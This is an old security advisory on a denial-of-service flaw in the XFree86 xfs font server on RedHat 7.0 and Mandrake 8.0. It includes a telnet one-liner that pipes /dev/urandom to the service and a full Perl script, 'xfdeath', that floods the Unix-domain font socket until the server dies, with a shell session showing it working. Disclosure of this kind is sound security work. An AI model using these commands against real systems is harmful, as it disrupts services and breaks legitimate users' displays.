COMMAND
xfs
SYSTEMS AFFECTED
Linux
PROBLEM
xfs from the package XFree86-xfs-4.0.1-1 (i386.rpm), RedHat 7.0
seems to suffer from a Denial of Service attack. To cause xfs to
stop responding for requests, try to do the fillowing:
$ telnet victim xfs </dev/urandom
Repeat about 100 (or 1000) times and you get Connection refused
message.
Regular Xservers can no longer connect, usually crash stating
Could not open default font 'fixed' and probably get disabled for
5 minutes if run from inittab.
Valentine M. Smith found this originally. Since, this has been
confirmed on Mandrake 8.0 as well.
The TCP attack against the font server is (obviously) only
applicable to font-servers listening to TCP. (Which is probably
only the case for systems serving x-terminals.)
If we want to kill a font-server running on the
Mandrake/Redhat/whatever *default* setup, we have to send the
garbage to the Unix-Domain socket instead.
[user@userland ~]$ ps -ax|grep xfs
3690 ? S 0:00 xfs -port -1 -daemon -user xfs
3723 pts/2 S 0:00 grep xfs
[user@userland ~]$./xfdeath
[user@userland ~]$ ps -ax|grep xfs
3780 pts/1 S 0:00 grep xfs
[user@userland ~]$cat xfdeath
#!/usr/bin/perl -w
use Socket;
use strict;
my ($grab, $line, $garbagebyte,$i,$STOP);
sub darned {
$STOP=1;
}
open(GARBAGE, "/dev/urandom") || die "cannot read /dev/urandom: $!";
$SIG{'PIPE'} = 'darned';
for ($i = 0; $i < 1000; ++$i)
{
$STOP=0;
$grab = shift || '/tmp/.font-unix/fs-1';
socket(A_SOCKET, PF_UNIX, SOCK_STREAM, 0) || die "socket: $!";
connect(A_SOCKET, sockaddr_un($grab)) || die "connect: $!";
while (!$STOP) {
read(GARBAGE, $garbagebyte, 1);
print ".";
print A_SOCKET $garbagebyte;
}
}
exit;
SOLUTION
Nothing yet.